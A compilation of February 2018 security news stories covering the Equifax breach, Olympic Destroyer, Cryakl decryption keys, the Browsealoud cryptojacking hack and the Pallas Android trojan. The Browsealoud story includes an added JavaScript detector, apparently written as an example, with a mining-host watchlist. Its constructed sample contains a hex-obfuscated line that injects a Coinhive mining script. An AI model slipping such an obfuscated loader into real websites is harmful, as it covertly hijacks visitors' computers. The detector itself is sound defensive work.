While the infection vector is not known, CyberX VP of Research David Atch pointed out that older versions of the CIMPLICITY software are affected by CVE-2014-0751, a path traversal vulnerability that can be exploited for arbitrary code execution. This flaw was exploited a few years ago by Russia-linked hackers to deliver the BlackEnergy malware.

“Although it's widely believed that Black Energy was developed by a state-sponsored hacking group (most likely Sandworm aka Telebots), the vulnerability is relatively easy to exploit and therefore it's easy to imagine that non-state actors such as cybercriminal organizations now have access to tools that can exploit the same vulnerability,” Atch explained.


Equifax Hires Former Home Depot Security Chief Jamil Farshchi as CISO
13.2.2018 securityweek Incident
Credit reporting agency Equifax announced on Monday that it has named Jamil Farshchi as its Chief Information Security Officer (CISO).

Farshchi replaces Equifax Chief Security Officer Susan Mauldin, who abruptly retired from the company after a massive data breach was disclosed in late 2017.

Farshchi previously served as CISO at The Home Depot, where he was hired in March 2015 after the retailer suffered a massive data breach. Before Farshchi took the reins as CISO at the home improvement company, cybercriminals had managed to steal email addresses and payment card data belonging to more than 56 million Home Depot customers in 2014.

According to Equifax, Farshchi will be based in Atlanta and assume “company-wide leadership of work already underway to transform the company's information security program, and collaborate with the industry to share best practices on information security.”

He will report to the Chief Executive Officer, the company said.

"Jamil has a reputation for helping enterprises rebuild and fortify information security programs,” Paulino do Rego Barros, Jr., interim Chief Executive Officer at Equifax, said in a statement. “His expertise in risk intelligence and cybersecurity combined with his intimate knowledge of industry best practices will allow us to design and deploy a best-in-class, global security strategy to re-establish ourselves as a trusted leader."

Prior to his role at The Home Depot, Farshchi was the first Global CISO at Time Warner. Before that, he was the Vice President of Global Information Security at Visa. Farshchi has also held senior roles at Los Alamos National Laboratory, Sitel Corporation, Nextwave Broadband, and NASA.

He holds a master's degree from the University of Pennsylvania’s Wharton Business School and a bachelor's degree in Business Administration from the University of Oklahoma.

"Equifax is a company with tremendous potential, and I am confident that we will transform our security program into one of the most advanced and recognized globally," said Farshchi. "I am grateful for this new challenge and am looking forward to enabling the business with new insights, a fresh perspective, and a multi-dimensional way of thinking about global data stewardship and information security."

In September 2017, Equifax revealed that hackers had accessed its systems between mid-May and late July 2017. The company eventually said the breach affected roughly 145 million customers – mostly in the U.S., but also in Canada and the United Kingdom – including their social security numbers, dates of birth, addresses, and in some cases driver’s license numbers, payment cards, and dispute documents.

Documents provided recently by Equifax to senators revealed that the breach suffered by the company last year may have involved types of data not mentioned in the initial disclosure of the incident.


Pyeongchang – Olympic Destroyer Unleashed to Embarrass Pyeongchang 2018 Games
13.2.2018 securityaffairs Cyber

Shortly before the Pyeongchang opening ceremonies on Friday, televisions at the main press centre, wifi at the Olympic Stadium and the official website were taken down.
It is well known that big events attract the attention of hackers. The biggest event right now is the 2018 Winter Olympics in Pyeongchang, South Korea and it looks like the hackers have arrived. Shortly before the opening ceremonies on Friday, televisions at the main press centre, wifi at the Olympic Stadium and the official website were taken down. All systems were restored by 8AM on the following Saturday, and although individuals were unable to print event tickets during the outage, the organizing committee described the event as affecting only “noncritical systems.” Given the high profile of the games, the rumor mill immediately began spreading whispers that the outage was the result of a cyberattack.

After restoring services and investigating the cause, Pyeongchang 2018 spokesperson Sung Baik-you issued an official statement on Sunday evening confirming that the outage resulted from a cyber attack.

“There was a cyber-attack and the server was updated yesterday during the day and we have the cause of the problem”, Sung Baik-you said.

Leading up to the Olympic Games there was a lot of speculation as to whether North Korea would attempt to disrupt them. Along with China and Russia, North Korean cyberwarfare teams are often suspected in large-scale attacks such as these. In this case, the International Olympic Committee (IOC) is refusing to participate in any speculation as to the source of the attacks.

“We wouldn’t start giving you the details of an investigation before it has come to an end, particularly because it involves security which at these games is incredibly important. I am sure you appreciate we need to maintain the security of our systems,” said Mark Adams, head of communications for the IOC.

While the IOC and Pyeongchang spokespeople are being cautious about releasing details in order to focus on ensuring the security and safety of the games, Cisco Talos has been forthcoming with technical details of the attack. While they haven’t pointed fingers at specific attackers, in a Talos blog post on February 12 they stated, “[samples identified] are not from adversaries looking for information from the games but instead they are aimed to disrupt the games.”


According to their research, there are many similarities between the Pyeongchang attack, which they are dubbing “Olympic Destroyer”, and earlier attacks such as BadRabbit and NotPetya. All of these attacks are focused on the destruction and disruption of equipment rather than on data exfiltration or other, more subtle activity. Using legitimate tools such as PsExec and WMI, the attackers specifically target the pyeongchang2018.com domain, attempting to steal browser and system credentials in order to move laterally in the network, and then wipe the victim computer to make it unusable.

While the source of the attacks is uncertain, the Cisco Talos blog post is clear in identifying motivation, “Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony.”


Victims of some versions of the Cryakl ransomware can decrypt their files for free
13.2.2018 securityaffairs Ransomware

Free decryption keys for the Cryakl ransomware have been added to the free Rakhni Decryptor, which can be downloaded from the NoMoreRansom website.
The Belgian Federal Police located the command and control server used by the criminal organization behind the Cryakl ransomware. The server was hosted in an unspecified neighboring country; law enforcement seized it and shared the decryption keys found on the machine with the No More Ransom project.

“The Belgian Federal Police is releasing free decryption keys for the Cryakl ransomware today, after working in close cooperation with Kaspersky Lab. The keys were obtained during an ongoing investigation; by sharing the keys with No More Ransom the Belgian Federal Police becomes a new associated partner of the project – the second law enforcement agency after the Dutch National Police.” reads the statement published by Europol.

“Led by the federal prosecutor’s office, the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys. Kaspersky Lab provided technical expertise to the Belgian federal prosecutor and has now added these keys to the No More Ransom portal on behalf of the Belgian federal police. This will allow victims to regain access to their encrypted files without having to pay to the criminals.”

The “exponential” rise in the ransomware threat represents a serious problem for users online and a profitable business for cyber criminals. The No More Ransom operation is Europol’s response to the growing threat.


Victims of Cryakl ransomware can recover encrypted files using the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom at the following URL.

The tool works with most versions of the Cryakl ransomware, but researchers at MalwareHunterTeam confirmed that it doesn’t work with CL 1.4.0 and newer (so 1.4.0 is included in what can’t be decrypted).

It has been estimated that the tool has helped more than 35,000 victims of ransomware to decrypt their files for free, an overall loss for crooks of over €10m.

“There are now 52 free decryption tools on www.nomoreransom.org, which can be used to decrypt 84 ransomware families. CryptXXX, CrySIS and Dharma are the most detected infections.” continues the statement.

The Belgian authorities are still investigating the case.


Lenovo Patches Critical Wi-Fi Vulnerabilities
12.2.2018 securityweek Vulnerability
Lenovo has released patches for two critical vulnerabilities that were found last year in certain Broadcom Wi-Fi controllers.

Identified as CVE-2017-11120 and CVE-2017-11121, the two issues were discovered by Google Project Zero and were publicly disclosed in September 2017.

Both vulnerabilities affect Broadcom Wi-Fi chips found in many mobile devices, thus having an industry-wide impact. Both were addressed in the Android and iOS operating systems in September last year.

When disclosing the bugs, Gal Beniamini of Google Project Zero explained that an attacker within Wi-Fi range could exploit CVE-2017-11120, an out-of-bounds write issue, to achieve arbitrary code execution on an impacted device.

“Upon successful execution of the exploit, a backdoor is inserted into the firmware, allowing remote read/write commands to be issued to the firmware via crafted action frames (thus allowing easy remote control over the Wi-Fi chip),” the researcher said.

CVE-2017-11121 can be abused by means of malicious over-the-air Fast Transition frames designed to trigger internal Wi-Fi firmware heap and/or stack overflows. This could lead to remote code execution as well.

“Broadcom has issued an advisory for certain Broadcom WiFi controllers used by many computer and device makers, which contain buffer overflow vulnerabilities on the adapter (not the system CPU),” Lenovo noted in an advisory last week.

The computer maker also notes that, while Broadcom “initially did not plan to remediate these issues,” the chipmaker released patches for both bugs after the WPA2 KRACK vulnerability became public.

“Lenovo received the first of these near the end of 2017, and continues releasing fixes as integration and testing is completed,” the company says.

Lenovo explains that only its ThinkPad products pack the affected Broadcom WiFi controllers. The computer maker also published a list of all impacted ThinkPad devices and recommends that users update to the WiFi driver version (or newer) indicated for their models.


IBM Releases Spectre, Meltdown Patches for Power Systems
12.2.2018 securityweek Vulnerability
IBM has released firmware and operating system updates to address the Meltdown and Spectre vulnerabilities in the company’s Power Systems servers.

IBM started releasing firmware patches for its POWER processors within a week after the Spectre and Meltdown attack methods were disclosed. Firmware updates were first released for the POWER7+ and POWER8 processors, but customers would have to wait another month for operating system patches.

The company announced late last week the availability of patches for remaining POWER processors, along with updates for its AIX and IBM i operating systems.

Firmware patches are now available for POWER7, POWER7+, POWER8 and POWER9 processors. Earlier versions will not receive updates as they have reached end of service and IBM recommends migrating to a supported generation.

The vulnerabilities that allow Meltdown and Spectre attacks (CVE-2017-5753, CVE-2017-5715 and CVE-2017-5754) have also been patched in IBM i with the release of program temporary fixes (PTFs) for versions 7.1, 7.2 and 7.3. Fixes have also been released for AIX 5.3, 6.1, 7.1 and 7.2, and VIOS 2.2.x.

Both firmware and operating system updates must be installed for effective protection against Meltdown and Spectre attacks. However, it’s recommended that the firmware patches are applied prior to the operating system updates.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data. Billions of devices using Intel, AMD, ARM, Qualcomm and IBM processors are affected.

Impacted vendors started releasing software and firmware patches shortly after the methods were disclosed, but both types of fixes caused problems.

A few weeks after it started releasing microcode patches, Intel decided to halt updates due to frequent reboots and unpredictable system behavior. The company now says it has identified the root cause of the problem and started releasing a new round of patches.

Intel and AMD told customers that their future products will include built-in protections against exploits such as Spectre and Meltdown.


Crypto Mining Malware Infects Thousands of Websites
12.2.2018 securityweek CoinMine
Hacked Script Infects Several Government Sites with Cryptominer

The websites of numerous government, health and education organizations worldwide were infected with a crypto-currency miner over the weekend, after a script running on all of them was maliciously modified.

The culprit was Browsealoud, a script developed by Texthelp to add “speech, reading, and translation to websites.” The software was designed to provide access and participation to people with Dyslexia, Low Literacy, English as a Second Language, and to those with mild visual impairments, the company says.

Over the weekend, Texthelp was the target of a cyber-attack that resulted in a JavaScript file, part of the Browsealoud script, being modified. Because of that, Browsealoud would inject a Coinhive cryptojacking script into the visitors’ browsers, to turn them into crypto-currency mining machines.

“At 11:14 am GMT on Sunday 11th February 2018, a JavaScript file which is part of the Texthelp Browsealoud product was compromised during a cyber-attack. The attacker added malicious code to the file to use the browser CPU in an attempt to illegally generate cryptocurrency. This was a criminal act and a thorough investigation is currently underway,” the company revealed in a blog post.

As a result of this attack, numerous government websites in the United Kingdom, the United States, and Australia were infected with the crypto-mining software.

As Scott Helme, the researcher who noticed the malicious script, quickly discovered, a total of 4275 websites were impacted in this attack, including prominent sites such as the UK's Information Commissioner's Office, the NHS, the General Medical Council, U.S. Courts, academic websites, and many others.

“The ba.js had been altered to include a document.write call that added a CoinHive crypto miner to any page it was loaded in to. The sheer number of sites affected by this is huge and some of them are really prominent government websites,” Helme points out.

The reason so many websites were impacted isn’t only the ease of use Browsealoud promises, as admins only need to copy and paste one script to take advantage of it, but also regulatory requirements around accessibility that many sites need to comply with, especially government sites.

Soon after realizing the cause of the infection, Helme notified Texthelp, which decided to take Browsealoud offline, thus removing it from all of their customer sites immediately. The company claims that taking the product down allowed them to address the issue without requiring customers to take action.

“Texthelp can report that no customer data has been accessed or lost. The company has examined the affected file thoroughly and can confirm that it did not redirect any data, it simply used the computers’ CPUs to attempt to generate cryptocurrency. The exploit was active for a period of four hours on Sunday,” Martin McKay, CTO and Data Security Officer, Texthelp, says.

McKay also noted that, although the issue has been addressed, Browsealoud will remain offline until Tuesday so that customers can be informed of the issue. He also pointed out that no other Texthelp products have been affected.

“A security review will be conducted by an independent security consultancy. The investigation is ongoing, and customers will receive a further update when the security investigation has been completed,” McKay concluded.

UK’s National Cyber Security Centre also said they were examining the incident.

“The affected service has been taken offline, largely mitigating the issue. Government websites continue to operate securely. At this stage there is nothing to suggest that members of the public are at risk,” the NCSC said.

However, it appears that the issue might not have been completely resolved, as Helme points out on Twitter. The researcher claims that even today the malicious script attempts to load when accessing the UK's Information Commissioner's Office website, likely from cache. This means that returning visitors might still be impacted.


NoMoreRansom: Free Decryption for Latest Cryakl Ransomware
12.2.2018 securityweek Ransomware
Decryption keys for a current version of Cryakl ransomware have been obtained and uploaded to the NoMoreRansom website. Victims of Cryakl can potentially recover encrypted files with the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom.

NoMoreRansom is a collaborative public/private project launched by Europol, the Dutch National Police, Kaspersky Lab and McAfee in July 2016. Its purpose is to help ransomware victims recover encrypted files through the use of decryptors. Since its launch, other national law enforcement agencies and additional private companies have joined the project. There are now 52 decryption tools available on the site, able to recover files from 84 ransomware families.

The project now comprises more than 120 partners, including more than 75 private organizations. The Cypriot and Estonian police are the most recent law enforcement agencies to join, while KPN, Telenor and The College of Professionals in Information and Computing (CPIC) have joined as new private sector partners. Europol claims that the site has enabled more than 35,000 ransomware victims to recover their files without paying a ransom – preventing criminals from profiting from more than €10 million.

The Rakhni Decryptor, developed by Kaspersky Lab, could already decrypt older versions of Cryakl – which first appeared in 2015. It could not, however, decrypt the latest version – which it now does.

The Belgian Federal Computer Crime Unit (FCCU) learned that Belgian citizens had been victims of this new version of Cryakl. It was able to locate a C2 server in an unspecified neighboring country. The Netherlands is one neighbor state that is often used by criminals to host their malicious servers.

“Led by the federal prosecutor's office,” announced Europol Thursday, “the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys.” Kaspersky Lab provided technical expertise, and has now included the recovered keys in its Rakhni Decryptor, uploaded on behalf of the Belgian authorities.

The Rakhni Decryptor, says Kaspersky Lab, “Decrypts files affected by Rakhni, Agent.iih, Aura, Autoit, Pletor, Rotor, Lamer, Cryptokluchen, Lortok, Democry, Bitman (TeslaCrypt) version 3 and 4, Chimera, Crysis (versions 2 and 3), Jaff, Dharma and new versions of Cryakl ransomware.”

The Belgian authorities are continuing their investigation into the operators of the seized C2 servers, but decided not to wait before making the recovered keys available to victims. It is, says Europol, “another successful example of how cooperation between law enforcement and internet security companies can lead to great results.”


CSE CybSec ZLAB Malware Analysis Report: Dark Caracal and the Pallas malware family
12.2.2018 securityaffairs  Android
Dark Caracal APT – The Pallas Family

Researchers from the CSE ZLab Malware Analysis Laboratory analyzed a set of samples of the Pallas malware family used by the Dark Caracal APT in its hacking operations.
The malware researchers from ZLab analyzed a collection of samples related to a new APT tracked as Dark Caracal, which was discovered by the Electronic Frontier Foundation in collaboration with Lookout Mobile Security.

Dark Caracal has been active at least since 2012, but it was only recently identified as a powerful threat actor in the cyber arena.

The first analysis of the APT linked it to the Lebanese General Directorate of General Security.

Dark Caracal is behind a number of stealthy hacking campaigns that, over the last six years, aimed to steal text messages, call logs, and files from journalists, military staff, corporations, and other targets in 21 countries worldwide.

One of their most powerful campaigns started in the first months of last year, using a series of trojanized Android applications to steal sensitive data from the victim’s mobile device. The trojan injected into these applications is known in the threat landscape under the name Pallas.

The threat actors use the “repackaging” technique to generate their samples: they start from a legitimate application and inject the malicious code before rebuilding the APK.

The target applications belong to specific categories, such as social chat apps (WhatsApp, Telegram, Primo), secure chat apps (Signal, Threema), or software related to secure browsing (Orbot, Psiphon).

The attackers used social engineering techniques to trick victims into installing the malware. Attackers use an SMS, a Facebook message or a Facebook post that invites the victim to download a new version of the popular app from a specific URL:

http://secureandroid[.]info,

All the trojanized apps are hosted at the same URL.

Figure 1 – Dark Caracal Repository – Malicious site

This malware is able to collect a large amount of data and to send it to a C&C server through an encrypted URL that is decrypted at runtime. The capabilities of the trojan are:

Read SMS
Send SMS
Record calls
Read calls log
Retrieve account and contacts information
Gather all stored media and send them to the C&C server
Download and install other malicious software
Display a phishing window in order to try to steal credentials
Retrieve the list of all devices connected to the same network
Further details are included in the complete report published by CSE.


Thousands More Personal Records Exposed via Misconfigurations
12.2.2018 securityweek Incident
Two more misconfigured databases exposing the personal details of thousands of people were disclosed late last week.

The Maryland Joint Insurance Association (MDJIA, with offices in Ellicott City, MD) left open internet access to a data repository of customer files containing information such as customer names, addresses, phone numbers, birth dates, and full Social Security numbers; together with financial data such as check images, full bank account numbers, and insurance policy numbers. Also exposed were MDJIA access credentials for ISO ClaimSearch, a third-party insurance database containing ‘tens of millions of reports on individual insurance claims’ for industry professionals. The problem was a NAS server with port 9000 open to the internet.

Paris-based Octoly, a brand marketing firm, left open internet access to an AWS S3 bucket. This contained details of its IT operations, including sensitive personal details of more than 12,000 social media influencers used in its marketing campaigns. The details include the real names, addresses, phone numbers, email addresses – including those specified for use with PayPal – and birth dates, together with thousands of hashed passwords.

Both misconfigurations were discovered by Chris Vickery, the director of cyber risk research at UpGuard. Researcher Vickery has discovered numerous misconfigurations providing open access to sensitive, often personal, information over the last few years. Examples include details of 191 million U.S. voters, nearly 1.4 billion user records exposed by known spammers, and sensitive military data belonging to the U.S. National Geospatial-Intelligence Agency (NGA) left exposed by contractor Booz Allen Hamilton.

None of these misconfigurations require any hacking effort or skill to exploit, merely a computer with internet access. If a white hat researcher such as Vickery can find them, potentially any malicious actor could also find them with disastrous results. The question then is, why do misconfigurations, rated #6 in the OWASP top ten threats list, happen so frequently – and what should organizations do to prevent them?

Bryce Carlen, CIO at Washington State Department of Commerce, notes that MDJIA is a small organization with minimal – if any – dedicated IT staff. He warns that there may be many more small organizations in a similar position. “If this is as small an organization as it appears to be, then all of this is no real surprise. If you only have the budget for one or two IT staff or contractors, it's likely you're not going to have dedicated security staff or deep security expertise in the generalists you have working for you.” The problem, he added, is that small organizations don't understand the risks until after a cybersecurity event, because protecting data is not part of the core business based around using that data.

The Octoly incident is similar to many other examples of exposed AWS S3 buckets. “Every time I look at the AWS control panel, it seems like there are new services available, each of which comes with new settings and configuration switches. It's especially tough when you layer that on top of the constantly evolving job of securing your on-prem environment against shifting threats,” Carlen said.

He fears that the cloud is simply increasing 'security fatigue', leading to simple errors. “It's one of the things that frightens me about the cloud. There are a bunch of what appear to be otherwise competent organizations making a big mess with cloud configuration settings.”

Randy Potts, information security leader at Real Time Resolutions, Inc, believes the problem is still a missing 'culture of security' in many organizations. “Both of these incidents [last week] happened because the person that deployed them did not think about the bad actors. They only think about giving access to the people that need it, not preventing access from those that should not have it.”

He believes that it is the continuing point of tension between IT and information security. “IT is measured by uptime and functionality, but information security is measured by controlling access to data. From the IT perspective, information security risks breaking access and harming functionality.” He believes that IT personnel need to understand security better: “They need to respect that while not taking that extra step may save time now, it can have a serious impact on the organization later.”

But the problem goes beyond just IT and security into the entire corporate culture; that is, “the moral obligation that everyone handling sensitive information has to the people that correspond to that PII.” That includes the business owners as well as the IT staff and the security team.

This is a theme agreed by Graham Mann, managing director at CyberSpace Defence Ltd. “Management must shoulder their portion of the blame because they simply do not attach sufficient importance to security,” he says. He believes it is an area that can be addressed by legislation – indeed, it has already been addressed by the EU's General Data Protection Regulation (GDPR).

“GDPR specifically addresses the issues outlined in these so-called misconfiguration problems,” he told SecurityWeek; “and had Octoly happened five months later, they would now be facing a significant fine. Moreover, given the closeness of GDPR, it’s somewhat amazing that Octoly hasn't yet put measures in place to avoid such catastrophes.

“Misconfigurations are entirely feasible and easy to make when you are rushing to implement a device or making seemingly innocuous modifications to existing devices,” he continued. “Most IT administrators probably never consider the implications or consequences of making such errors. That’s why you need to consider the potential repercussions in advance (as specified in GDPR); you need to undertake a risk analysis on everything you do -- what could go wrong and what can we do to ensure any errors are mitigated. This is where management are critical: the involvement of security must be supported from above.”

Security researcher and consultant, Stewart Twynham, goes one step further. He believes the gaps between IT and security can be closed by treating both as aspects of corporate governance. “Professional IT people are under constant pressure to get things done, which is why security should be treated as a governance issue as well as an IT one,” he suggests. “Without those checks and balances (have we carried out the due diligence? do we fully understand the technology? do we understand the risks? do we have a process in place to continuously review what we’ve set up?) mistakes like this will continue to happen.”

In short, misconfigurations will continue to occur while the pressure on IT to react instantly to business requirements goes unabated. Any alteration to the IT infrastructure should involve the security team before implementation. But this will require senior management to own the problem under an overarching corporate governance regime – and when that happens, misconfigurations will be less common.


New Details Surface on Equifax Breach
12.2.2018 securityweek Incident
Documents provided recently by Equifax to senators revealed that the breach suffered by the company last year may have involved types of data not mentioned in the initial disclosure of the incident.

In mid-May 2017, malicious actors exploited a known vulnerability in the Apache Struts development framework to gain unauthorized access to Equifax systems. The company said the breach affected roughly 145 million customers – mostly in the U.S., but also in Canada and the United Kingdom – including their social security numbers, dates of birth, addresses, and in some cases driver’s license numbers, payment cards, and dispute documents.

Confidential documents sent by Equifax to the Senate Banking Committee, copies of which were seen by CNN and The Wall Street Journal, show that hackers may have also stolen tax identification numbers, email addresses, and driver’s license information other than just license numbers.

In response to news reports, Equifax said its initial disclosure was never intended to include all the types of information that may have been compromised.

U.S. Senator Elizabeth Warren has called on Equifax to provide clarifications on what she has described as “conflicting, confusing and incomplete information” provided by the company to the public and Congress.

According to Sen. Warren, Equifax told the Banking Committee in early October that passport numbers had also been included in the database tables possibly accessed by the attackers, but now the credit reporting agency claims passports were not compromised.

“As your company continues to issue incomplete, confusing and contradictory statements and hide information from Congress and the public, it is clear that five months after the breach was publicly announced, Equifax has yet to answer this simple question in full: what was the precise extent of the breach?” Sen. Warren wrote in a letter to Equifax.

The senator has given Equifax one week to provide a full and complete list of data elements confirmed or believed to have been compromised in the breach, along with a timeline of its efforts to determine the full extent of the intrusion.

Sen. Warren last week published a 15-page report containing the findings of her own four-month investigation into Equifax’s failures. The lawmaker’s investigation found that the company had set up a flawed system to prevent data security incidents, ignored numerous warnings of risks to customer data, failed to disclose the breach to stakeholders in a timely manner, and provided inadequate assistance and information to consumers. The report also said Equifax had taken advantage of federal contracting loopholes to force the IRS into signing a contract.

Earlier this year, senators Warren and Mark Warner introduced a bill that would provide the Federal Trade Commission (FTC) with punitive powers over the credit reporting industry for poor cybersecurity practices. The bill came in response to the Equifax breach.

Reuters reported earlier this month that Mick Mulvaney, the head of the Consumer Financial Protection Bureau (CFPB), had halted the probe into the Equifax breach. Following the news, 32 senators sent a letter to the CFPB asking for additional information on its investigation.


49% of crypto mining scripts are deployed on pornography-related websites
12.2.2018 securityaffairs CoinMine

The number of crypto mining scripts discovered by security experts continues to increase, especially those deployed illegally on hacked servers.
Researchers at Qihoo 360’s Netlab identified crypto mining scripts by analyzing DNS traffic with their DNSMon system. They were able to determine which sites load scripts from domains associated with in-browser mining services.

According to the researchers, 49% of crypto mining scripts are deployed on pornography-related websites.

The study revealed that cryptocurrency mining scripts are also deployed on fraud sites (8%), advertising domains (7%), and cryptocurrency mining (7%).

“0.2% of websites have web mining code embedded in the homepage: 241 (0.24%) in Alexa Top 100,000 websites, 629 (0.21%) in Alexa Top 300,000 websites,” reads the analysis published by NetLab.

“Pornographic related websites are the main body, accounting for 49% of these websites. Others include fraud (8%), advertising (7%), mining (7%), film and television (6%) and other categories.”

The most used crypto mining script is Coinhive (68%+10%), followed by JSEcoin (9%).

The fact that cryptocurrency mining scripts are most often deployed on porn websites is not a surprise: such sites attract a large number of visitors who spend a lot of time watching their content.

Mining activity online is increasing rapidly; Netlab’s report includes a graph of DNS traffic trends for mining sites.

Below are the categories of new actors most involved in mining activities:

Advertisers: on some websites the mining activity is introduced through the advertisers’ external links.
Shell link: some websites use a “shell link” to hide the mining site link in the source code.
Short domain name service provider: goobo.com.br is a Brazilian URL-shortening service; its home page, and any short link generated through the service, loads Coinhive mining code when accessed.
Supply chain contamination: www.midijs.net is a JS-based MIDI file player, and its source code, embedded by other websites, loads Coinhive mining code.
Self-built pool: some people have published open-source code on GitHub that can be used to build a private mining pool.
Web users informed of mining: authedmine.com is an emerging mining site that claims to begin mining only with the explicit knowledge and authorization of users.


Thousands of websites worldwide hijacked by cryptocurrency mining code due to Browsealoud plugin hack
12.2.2018 securityaffairs CoinMine

Thousands of websites worldwide were hijacked by cryptocurrency mining code after the popular Browsealoud plugin was compromised.
A massive attack hit thousands of websites around the world: crooks deployed Coinhive scripts that forced visitors’ browsers to secretly mine cryptocurrency.

The list of compromised websites (4275) includes the UK’s NHS, Information Commissioner’s Office (ICO) (ico.org.uk), the UK’s Student Loans Company (slc.co.uk), The City University of New York (cuny.edu), and the US government’s court system.

Once the hack was discovered, some sites went down; the ICO also took its website offline.

The compromised websites use the Browsealoud plugin, which makes their content accessible to blind or partially sighted people by reading it aloud.

In a time-window of roughly seven hours (between 0300 and 1145 UTC), all the websites using Browsealoud inadvertently ran the Monero cryptocurrency mining code.

The attackers injected an obfuscated version of the mining code into the plugin; once converted from hexadecimal back to ASCII, it loaded the mining code into the webpage.
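A small scanner for the kind of hex-escaped string obfuscation described above, added here as an example (it is not Texthelp’s or Scott Helme’s code). It decodes runs of \xNN escapes found in a JavaScript file and flags any decoded string that references a known in-browser mining service; the watchlist and the sample plugin file are constructed for this example from the services named in this digest.

```javascript
// Added example: detect hex-escaped (\xNN) strings in JavaScript source that
// decode to references to known in-browser mining services. Not code from the
// original article; the sample file and the watchlist are constructed.
const HEX_RUN = /(?:\\x[0-9a-fA-F]{2}){4,}/g; // four or more consecutive \xNN escapes

// Constructed watchlist of mining-service hostnames mentioned in this digest.
const MINING_HOSTS = ["coinhive.com", "authedmine.com", "jsecoin.com"];

// Decode one run of \xNN escapes back to text.
function decodeHexRun(run) {
  return run.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) =>
    String.fromCharCode(parseInt(h, 16))
  );
}

// Return every decoded hex run in the source, with the 1-based line it was found on.
function decodeHexStrings(source) {
  const out = [];
  source.split("\n").forEach((line, i) => {
    for (const m of line.matchAll(HEX_RUN)) {
      out.push({ line: i + 1, encoded: m[0], decoded: decodeHexRun(m[0]) });
    }
  });
  return out;
}

// Keep only decoded strings that mention a watchlisted host.
function findMiningReferences(source) {
  return decodeHexStrings(source).filter(({ decoded }) => {
    const lower = decoded.toLowerCase();
    return MINING_HOSTS.some((host) => lower.includes(host));
  });
}

// Helper used only to build the constructed sample: encode text as \xNN escapes.
function toHexEscapes(text) {
  return Array.from(
    text,
    (c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")
  ).join("");
}

// Constructed sample: a benign-looking plugin file with one injected loader line
// whose URL has been hex-escaped so that a plain text search for the host fails.
const SAMPLE = [
  "// reader plugin (constructed sample)",
  "function speak(el) { return el.textContent; }",
  'var s = document.createElement("script");',
  `s.src = "${toHexEscapes("https://coinhive.com/lib/example.js")}";`,
  "document.head.appendChild(s);",
].join("\n");

const hits = findMiningReferences(SAMPLE);
for (const h of hits) {
  console.log(`line ${h.line}: ${h.decoded}`); // line 4: https://coinhive.com/lib/example.js
}
```

Other encodings (plain hex fed through String.fromCharCode, base64, or string splitting) need their own patterns, and the watchlist only catches the hosts it names, so this check complements rather than replaces integrity checks on the served file.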


The alarm was raised by security expert Scott Helme, who was contacted by a friend who had received antivirus warnings after visiting the UK ICO website.

“This type of attack isn’t new – but this is the biggest I’ve seen. A single company being hacked has meant thousands of sites impacted across the UK, Ireland and the United States.” said Helme.

“Someone just messaged me to say their local government website in Australia is using the software as well.”



Scott Helme

@Scott_Helme
Ummm, so yeah, this is *bad*. I just had @phat_hobbit point out that @ICOnews has a cryptominer installed on their site... 😮

2:46 PM - Feb 11, 2018
The expert suggests using the Subresource Integrity (SRI) technique to stop browsers from executing third-party scripts that have been modified after the embedding website vetted them.

Texthelp, the company that developed the Browsealoud plugin, has removed its Browsealoud code from the web to stop the cryptocurrency mining operation.

“In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year and our data security action plan was actioned straight away,” said Texthelp’s chief technology officer Martin McKay in a statement.

“Texthelp has in place continuous automated security tests for Browsealoud, and these detected the modified file and as a result the product was taken offline.”

Texthelp confirmed that “no customer data has been accessed or lost,” and “customers will receive a further update when the security investigation has been completed.”


Texthelp for Edu
@texthelp
Our Data security investigation underway at Texthelp, statement on our website: http://okt.to/EtJobI
Browsealoud was automatically removed from all our customers' websites in response. No action needed by our customers.

10:20 PM - Feb 11, 2018
The malicious code was removed by 1600 UTC today; the UK’s ICO website is currently in a minimal “maintenance” mode as a precaution.


U.S. Spies Bilked for $100,000 by Russian Peddling Trump Secrets: Report
11.2.2018 securityweek BigBrothers
A Russian man promising stolen hacking tools and compromising information on President Donald Trump fleeced American spies for $100,000 last year, The New York Times reported Friday.

In a story worthy of a John le Carre novel that included secret USB-drive handovers in a small West Berlin bar and coded messages delivered over the National Security Agency's Twitter account, CIA agents reportedly spent much of last year trying to buy back, from a Russian, hacking programs stolen from the NSA.

The seller, who was not identified but had links to both cyber criminals and Russian intelligence, tantalized the US spies with an offer of the NSA hacking tools that had been advertised for sale online by a shady group called the Shadow Brokers.

Some of the tools, developed by the NSA to break into the computers of US rivals, were used by other hackers last year to break into computer systems around the world, including the global malware attack last May.

The seller, reached through a chain of intermediaries, wanted $1 million.

The $100,000, delivered in a cash-stuffed suitcase handed over in a Berlin hotel room, was an initial payment by US agents still dubious he really had what he was promising.

- Trump kompromat -

The seller also repeatedly pressed US agents with offers of compromising materials, or kompromat, on Trump, the Times said, citing US and European intelligence officials.

Although an investigation was already underway back in Washington on the link between Moscow and the Trump campaign, the agents did not want to get involved in anything that smelled of the politics back home.

The story -- which was also reported by The Intercept, an online magazine on national security matters -- paints a classic spy versus spy story where the US agents aren't ever certain about who they are dealing with and whether or not they are being baited and played by their Russian counterparts.

US intelligence officials say Russia interfered with the 2016 election to help elect Trump, and continues to use disinformation to sow confusion in the American political system.

The Intercept reported that the operation created rifts in the CIA, which is led by Trump loyalist Mike Pompeo but has many staffers still smarting over the president's repeated harsh comments about the intelligence community's role in the Russia meddling investigation.

The Russian's first delivery turned out to be hacking tools the Shadow Brokers had already released.

And he kept pushing his offer of kompromat on Trump, including shady financial records and a sex video that the US spies didn't really want.

In the end, the deal broke down last month -- the Russian did not come up with any of the unreleased NSA materials, and the Trump-related materials were either already known or untrustworthy.

The Russian was told by the Americans to leave Western Europe and not return, according to the Times.


South Korea Probes Cyber Shutdown During Olympics Ceremony
11.2.2018 securityweek BigBrothers
South Korea on Saturday investigated a mysterious internet shutdown during the Winter Olympics opening ceremony, which follows warnings of possible cyberattacks during the Pyeongchang Games.

